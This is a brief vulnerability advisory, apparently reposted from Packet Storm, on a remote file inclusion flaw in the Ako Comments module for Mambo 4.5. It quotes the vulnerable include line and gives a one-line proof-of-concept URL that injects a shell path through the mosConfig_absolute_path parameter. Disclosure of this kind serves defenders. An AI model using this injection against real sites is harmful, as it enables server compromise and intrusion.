Ako Comments suffers from a remote file inclusion vulnerability.
2497f52aba4b9e6f4ad669f137d110345db2352a684224f01bcb568161651249 ###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W #
# < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
###########################################################################################
#Software: Ako Comments (mod)
#Attack method: Remote File Inclusion
#Source:
#Description: This module shows users' comments from component AkoComments.
#File Version: 1.1 for Mambo 4.5
include_once($mosConfig_absolute_path.'/components/com_akocomment/languages/'.$mosConfig_lang.'.php');
************************************************************************************
#Proof of Concept:
#http://www.site.com/akocomments.php?mosConfig_absolute_path=shell
#
#----------------------------------------------------------
#
#
#Contact : Outlaw@aria-security.net
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed